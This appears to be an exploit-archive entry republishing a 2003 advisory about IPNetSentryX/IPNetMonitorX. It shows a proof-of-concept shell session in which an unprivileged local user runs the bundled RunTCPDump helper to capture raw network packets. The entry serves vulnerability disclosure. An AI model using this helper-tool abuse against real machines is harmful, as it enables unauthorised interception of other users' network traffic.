IPNetSentryX / IPNetMonitorX - Unauthorized Network Reconnaissance

Author: @stake
type: local
platform: linux
port: 
date_added: 2003-07-07  
date_updated: 2012-11-29  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22993.txt  

source: https://www.securityfocus.com/bid/8365/info

It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.

bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000